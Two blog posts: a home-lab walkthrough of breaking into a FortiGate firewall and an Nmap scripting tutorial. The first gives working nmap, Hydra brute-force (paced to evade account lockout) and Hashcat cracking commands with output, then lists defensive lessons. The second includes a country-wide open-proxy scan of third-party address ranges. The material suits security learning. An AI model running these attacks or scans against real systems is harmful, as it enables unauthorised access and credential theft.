Tag Archives: nmap

Simple and Practical Attack – Part 1

This weekend I got some time off and decided to build a small network environment that represented real-world security issues and their respective flaws.   I may well use this environment to perform tactics and techniques than an attacker might carry out in order to compromise a target. As result I could practice, learn and perform offensive techniques. Then, among other things I use this knowledge to create effective defenses and have some fun!

To get the environment ready I used a refurbished Fortigate 100 box running FortiOS 4.0 . I only configured the basic settings such as IP addresses, routing, admin user and basic firewall rules allowing management access from Internet. I left the remaining settings by default. The setup consisted of a single-arm DMZ. The wan port connected to the internet and the internal port connected to the internal network.  After having the network in place I needed an arsenal of tools that allowed me to perform offensive techniques. Kali Linux was my choice because this distribution brings the tools needed to execute the steps an intruder will eventually perform during an attack. This machine was positioned in the wan side of the setup.

With the environment ready I could start. The admirable Ed Skoudis describes the anatomy of an attack as a 5 step model. The steps are reconnaissance, scanning, exploit, keeping access and covering tracks .

So, let’s start with scanning phase. By knowing your target you can go directly into the scanning phase.  Here the goal is to find any open ports, which services are they offering and which operating systems are they running.

To do this I used the well known and very popular open source tool for network exploration and security auditing called Nmap created by Fyodor. This tool is so popular that was even briefly shown in movies like Elysium where it is used to port scan Matt Damon’s augmented brain before transferring the data he carries in an attempt to hack the space station. Or The Matrix Reloaded, where Trinity scanned the city power grid to find a vulnerable SSH server.

Fiction apart, I started by launching Nmap using the TCP connect technique (-sT) which performs a 3 way handshake to verify if a TCP port is opened. Skipped DNS resolution (-n) and skipped host discovery (-Pn) which is used to determine if a host is alive in order to optimize the speed when scanning large volume of IP addresses.

The output resulted in two open TCP ports. Then I used this knowledge and executed the next scan in order to determine the service behind the open ports (-sV). This scan was able to tell that the service running on TCP port 443 was a Fortgate firewall http config.

root@linux:~# nmap -n -sT -Pn admin.ville.com
Starting Nmap 6.40 ( http://nmap.org ) at 2014-05-11 14:45 EDT
Nmap scan report for admin.ville.com
Host is up (0.00058s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
443/tcp open  https
Nmap done: 1 IP address (1 host up) scanned in 6.26 seconds
root@linux:~# nmap -n -sV -Pn admin.ville.com -p 443
Starting Nmap 6.40 ( http://nmap.org ) at 2014-05-11 14:45 EDT
Nmap scan report for admin.ville.com
Host is up (0.00022s latency).
PORT    STATE SERVICE  VERSION
443/tcp open  ssl/http Fortinet FortiGate 50B or FortiWifi 80C firewall http config
Service Info: Device: firewall; CPE: cpe:/h:fortinet:fortiwifi:80c
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.62 seconds

Now that I had knowledge about the end system the next step was to gain access.  Gaining access to a particular system depends on several factors including the architecture, its configuration and the level of access. In this case I had access to the management interface of the firewall so I could try to break in.

When connecting to the TCP port 443 using HTTPS, I was presented with the login page.  Here I could try to guess the default password, but FortiOS does not has a default password. By reading the vendor documentation I knew the administrator is prompted to change his password during the initial configuration. I also assumed the user name was “admin” because it is unusual to change this user. So, I only needed the password. To achieve this I used a technique to do login attempts using a list of common passwords. However, this could easily become an issue because by default when the admin user fails 3 consecutive attempts, the Fortigate will lock the account for 60s. In a small business environments where the systems are normally configured by one person who is overloaded and responsible to get the job done for the all IT systems this is likely not to be changed because there are more important things to do. Even though this slows down an attacker, it does not stop him from trying.  The other thing is that by default these small Fortigate appliances don’t log system or traffic related stuff into memory and because they do not contain a hard disk one will miss important system log related information. This is an advantage for the attacker who could slip under the radar. This could be easily corrected by a diligent sysadmin using a syslog server or a similar monitoring system.

So, next I needed to know how was the HTTP authentication mechanism constructed. In order to understand how the front-end authentication mechanism worked I accessed the URL through the lens of a proxy like Paros. In this case I used Firefox tamper plugin data which allows access to the details needed. I could see that the authentication uses an HTTP POST request with a set of parameters submitted in clear text. These were all the ingredients needed to launch an automated brute force login attempt.

tamper

Looking at my arsenal of tools I decided to use THC Hydra written by van Hauser. A great tool that can guess passwords in a very fast fashion across many different network services. This tool is more than 10 years old and version 8.0 was just released.

So, I used Hydra to perform a dictionary based attack against admin.ville.com using the https-form module.  To get a help page for this or any other modules on hydra,  one can use -U e.g., hydra https-post-form -U.

The command line might look a little cryptic in the beginning but it consists of:

  • <url>:<form parameters>:<condition string> .

Url is the /loginpage. Then the form parameters are the POST parameters captured using Firefox tamper data tool. The username and secretkey parameters have their values replaced by the “^USER^” and “^PASS^” which allows Hydra to substitute it to whatever word it would read from the dictionary. Then follows a condition string to check how a successful login will look like. In this case if an authentication request is successful the HTTP response will contain a Set-Cookie header. Then a static user is used (-l admin) following a dictionary list of words to be used as passwords (-P /usr/share/wordlists/fasttrack.txt). The other parameters are : show login and password combination (-V), exit after the first found login/password pair (-f), execute a task with 3 connections in parallel (-t 3) and wait 61s between each connection task.

A task consisting of 3 connections attempt with a pause of 61s between each task was chosen in order to avoid the account to be locked using the default Fortigate admin lock threshold settings. Of course this will be very time consuming exercise and might require weeks or months to find a password using a big wordlist.  However, in this case Hydra was able to found a password after 30m due to a common password.

root@linux:~# hydra admin.ville.com https-post-form "/logincheck:username=^USER^&secretkey=^PASS^&ajax=1:S=Set-Cookie"
-l admin -P /usr/share/wordlists/fasttrack.txt -V -f -t 3 -W 61
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-17 18:22:54
[DATA] 3 tasks, 1 server, 126 login tries (l:1/p:126), ~42 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target admin.ville.com - login "admin" - pass "P@55w0rd!" - 34 of 126 [child 0]
[ATTEMPT] target admin.ville.com - login "admin" - pass "P@ssword!" - 35 of 126 [child 2]
[ATTEMPT] target admin.ville.com - login "admin" - pass "Password!" - 36 of 126 [child 1]
[STATUS] 1.64 tries/min, 36 tries in 00:22h, 90 todo in 00:56h, 3 active
[STATUS] 1.57 tries/min, 36 tries in 00:23h, 90 todo in 00:58h, 3 active
[80][www-form] host: admin.ville.com   login: admin   password: P@55w0rd!
[STATUS] attack finished for admin.ville.com (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-05-17 18:46:29

Next, with access to the system I might want to continue exploiting other systems to find valuable information such as other passwords in the system which might allow me to establish foothold and strengthen my position. With access to the system I could look to see any other users which were configured in the system.

 

FG100A# get system admin
name: admin
name: JulesArgent
name: ColeGannon
name: DoubleTrouble
FG100A # show system admin admin
  set password ENC AK1VW7boNstVjM36VO5a8tvBAgUJwLjryl1E+27F+lOBAE=
FG100A # show system admin ColeGannon
   set password ENC AK1OtpiTYJpak5+mlrSoGbFUU60sYMLvCB7o/QOeLCFK28=
FG100A # show system admin DoubleTrouble
  set password ENC AK1P6IPcOA4ONEoOaNZ4xHNnonB0q16ZuAwrfzewhnY4CU=

Then, with valid credentials and their respective hashes I could attempt to crack them.. To accomplish this, I launched an offline dictionary attack followed by a brute force attack against the hashes using Hashcat – An extremely fast and powerful password cracking tool made by Atom. The command was executed to run a dictionary attack (-a 0) with the hashing algorithm type Fortinet (-m 7000) using the well known rockyou wordlist containing over 14 million passwords.

root@kali:/tmp# hashcat -a 0 -m 7000 ville.hash /usr/share/wordlists/rockyou.txt
Initializing hashcat v0.47 by atom with 8 threads and 32mb segment-size...
Added hashes from file fortinet: 3 (3 salts)
NOTE: press enter for status-screen
AK1P6IPcOA4ONEoOaNZ4xHNnonB0q16ZuAwrfzewhnY4CUA:rangers#1
AK1OtpiTYJpak5+mlrSoGbFUU60sYMLvCB7o/QOeLCFK28A:MyBestFriends
Input.Mode: Dict (/usr/share/wordlists/rockyou.txt)
Index.....: 5/5 (segment), 553080 (words), 5720149 (bytes)
Recovered.: 2/3 hashes, 2/3 salts
Speed/sec.: 8.10M plains, 8.10M words
Progress..: 553080/553080 (100.00%)
Running...: --:--:--:--
Estimated.: --:--:--:--
Started: Sat May 17 13:44:34 2014
Stopped: Sat May 17 13:44:38 2014

This attack is very effective and fast. But, not all passwords are on the dictionary file. As result I could continue with a brute force technique to pursue the extraction of remaining password. The second command was executed to run a brute force attack (-a 3) with the hashing algorithm type Fortigate (-m 7000) and to try using a charset that contains all upper-case letters, all lower-case letters and all digits (?a) for the maximum size of 9 characters.  In a matter of days/weeks the password could be broken.

root@kali:/tmp# hashcat -a 3 -m 7000 ville.hash ?a?a?a?a?a?a?a?a?a --pw-min=1

Initializing hashcat v0.47 by atom with 8 threads and 32mb segment-size...
Added hashes from file fortinet: 1 (1 salts)
Activating quick-digest mode for single-hash with salt
NOTE: press enter for status-screen
Input.Mode: Mask (?a?a?a?a?a) [5]
Index.....: 0/1 (segment), 7737809375 (words), 0 (bytes)
Recovered.: 0/1 hashes, 0/1 salts
Speed/sec.: - plains, 21.54M words
Progress..: 1284549568/7737809375 (16.60%)
Running...: 00:00:00:59
Estimated.: 00:00:04:59

Now, lets summarize the mistakes made by Ville.com so one perhaps learn from their errors and omissions.

Mistake #1 – Ville.com was not filtering incoming traffic to the management interface of its firewall. By allowing any IP address from the Internet to connect to the management interface Ville.com was exposed to a variety of attacks. A Nmap scan easily revealed the open ports and services associated with the ports. If there is a strong reason for someone to be able to do remote administration then the system should be configured with a list of trusted hosts and its configuration should be reviewed by someone who understands security.

Mistake #2 :  A common password based on dictionary with default account lock-out settings was used. This made an dictionary based attack easy to pull off using THC Hydra tool. Ville.com should consider applying as countermeasure to prevent such attacks a strong password or pass-phrase. Make sure is at least 12 characters long with a combination of numbers, upper and lower case letters plus special characters. Furthermore, passwords should be changed often. Other than that whenever possible use a second factor authentication methods such as Token, SMS or e-mail.

Mistake #3 : Ville.com was not using any kind of central logging system that would allow one to easily identify the password guessing attack. Further would allow a diligent sysadmin to do log review and identify abnormal activity even in case the attacker would attempt to cover its tracks.

Even though there are plenty of books and open source information that describe the methods and techniques demonstrated, the environment was built from scratch and allows to learn or reinforce techniques.  The tools and tactics used are not new. However, they are relevant and used in today’s attacks. Likewise, one can learn, practice and look behind the scenes to better know them and the impact they have. Part II will follow with more steps and how an attacker might increase its foothold , strengthen its position and move laterally.

 

Tagged , , , ,

Nmap 6 Scripting Engine with 400+ scripts

It was 1st of September of 1997, when Gordon Lyon released the article “The Art of Scanning” on the Phrack Magazine. This was the first release of the well known open source tool for network exploration and security auditing called Nmap. 15 Years later we have Nmap 6, NSE (Nmap Scripting Engine) and a bunch of books about the this powerfull tool.

Basically, I would like to introduce you to some of the Nmap Scripting Engine scripts available. The latest version bring more than 430 scripts. Let’s first install Nmap 6 and then use the NSE scripts. Using a Linux system, download the latest version of Nmap 6 from the official source code repository. To accomplish this task gcc, openssl and make should be part of your system. Subversion control versioning system is the best way to download the version and stay up2date.

$ cd /tmp/
$ mkdir nmap
$ svn co –username guest https://svn.nmap.org/nmap

Then you can use the configure script to set up the different variables and parameters. Then run make to compile the code and generate the binary files. When building Nmap from source you can use ./configure –help to see a complete list of directives available

$ cd nmap/
$/tmp/nmap# ./configure
$/tmp/nmap# make
$/tmp/nmap# install
$ nmap -V
Nmap version 6.20BETA1 ( http://nmap.org )

Now that the latest version of Nmap is installed you should have around 430 scripts made with NSE under /usr/local.share/nmap/scripts. Among them you have scripts that allow you to check if a particular system is vulnerable to CVE-2012-1823, CVE-2012-2122, CVE-2012-1182 for PHP, MySQL and Samba services respectively.

Other ones are related to GeoIP and one particular interesting is called ip-geolocation-maxmind. This one gives you the ability to retrieve the Geo location of the IP you are scanning using the Maxmind database. To be able to run this script you first need to download the GeoLiteCity into /usr/local/share/nmap/nselib/data folder.

$cd /usr/local/share/nmap/nselib/data
$ wget -N -q http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
$ gunzip GeoLiteCity.dat.gz

$nmap –script ip-geolocation-maxmind  84.72.11.109  -p 80
Host script results:
| ip-geolocation-maxmind:
| 84.72.11.109
|   coordinates (lat,lon): 47.3667,8.55
|_  city: Zurich, Switzerland

Other than the GeoIP you can also retrieve the Whois Information Records without running a port scan.
$ nmap –script whois -v -Pn -sn 4.4.4.4
Host script results:
| whois: Record found at whois.arin.net
| netrange: 4.4.0.0 – 4.4.255.255
| netname: LVLT-STATIC-4-4-16
| orgname: Level 3 Communications, Inc.
| orgid: LVLT
| country: US stateprov: CO
|
| orgtechname: ipaddressing
|_orgtechemail: ipaddressing@level3.com

You can even further extend the use of Maxmind free services and download the GeoIPCountry.csv file. Then feed it into Nmap to scan a range of IP addresses for a particular Country.
$wget http://geolite.maxmind.com/download/geoip/database/GeoIPCountryCSV.zip
unzip GeoIPCountryCSV.zip
Looking at the contents of the file we can easily grep for the IP addresses for a particular country.
head GeoIPCountryWhois.csv
“0.116.0.0”,”0.119.255.255″,”7602176″,”7864319″,”AT”,”Austria”
“1.0.0.0”,”1.0.0.255″,”16777216″,”16777471″,”AU”,”Australia”
“1.0.1.0”,”1.0.3.255″,”16777472″,”16778239″,”CN”,”China”

Next, cat the file, grep for the string you want in this case Portugal. Then use AWK with “,” as delimiter, print field 1 and 2. Pipe that into tr and delete the character ‘. Write the output into the file IP.Addresses.PT.

$cat GeoIPCountryWhois.csv | grep Portugal | awk -F “,” ‘{print $1 “-” $2}’ | tr -d ‘”‘ > IP.Addresses.PT
root@bt:/tmp/nmap/nselib/data# head IP.Addresses.PT
2.80.0.0-2.80.18.255
2.80.20.0-2.83.255.255
5.43.0.0-5.43.63.255
5.44.192.0-5.44.207.255
5.158.0.0-5.158.63.255

Now, we need to change the format of the file in order to be readable by Nmap. We need to change from “2.80.0.0-2.80.18.255” to “2-2.80-80.0-18.0-255”.
To do that we use Awk with the split arguments. From the man page of Awk :

split(string, array, fieldsep)
This divides string into pieces separated by fieldsep, and stores the pieces in array. The first piece is stored in array[1], the second piece in array[2], and so forth. The string value of the third argument, fieldsep, is a regexp describing where to split string (much as FS can be a regexp describing where to split input records). If the fieldsep is omitted, the value of FS is used. split returns the number of elements created. The split function, then, splits strings into pieces in a manner similar to the way input lines are split into fields.

If you want to understand better this command I recommend to read carefull the previous paragraph .
$cat IP.Addresses.PT | awk -F “.” ‘{split($4,array,”-“); print $1”-“array[2]”.”$2″-“$5 “.” $3″-“$6″.”array[1]”-“$7}’  > IP.Addresses.PT.nmap

The output will be:
head IP.Addresses.PT.nmap
2-2.80-80.0-18.0-255
2-2.80-83.20-255.0-255
5-5.43-43.0-63.0-255
5-5.44-44.192-207.0-255

Now that we have the information parsed according to the Nmap expected format you can use another NSE script. This time the http-open-proxy which tries to identtify systems that will allow you to proxy connections. We can now scan per country ! The -Pn will scan the hosts even if they dont respond to icmp requests. and the -iL is to specify a list of hosts. The -p specifies the ports.

$nmap -Pn –script=http-open-proxy -iL IP.Addresses.PT.nmap -p 8080,3128

Another cool script is http-google-malware which checks if hosts are on Google’s blacklist of suspected malware and phishing servers. These lists are constantly updated and are part of Google’s Safe Browsing service. To be able to run this script you need to sign up for the Safe Browsing API. You can check manually the Safe Browsing functionality with the URL : http://www.google.com/safebrowsing/diagnostic?site=google.com . Replace the site=google.com with the site you want to check.

After you have your API key you can run the following command :

$nmap -Pn -p80  –script http-google-malware –script-args http-google-malware.api= http://www.site.com
PORT   STATE SERVICE
80/tcp open  http
|_http-google-malware.nse: Host is known for distributing malware

For each NSE script there are additional arguments that you can run with –script-args prefix. The best source of information about them is the .nse file itself  under /usr/local.share/nmap/scripts.

Tagged , ,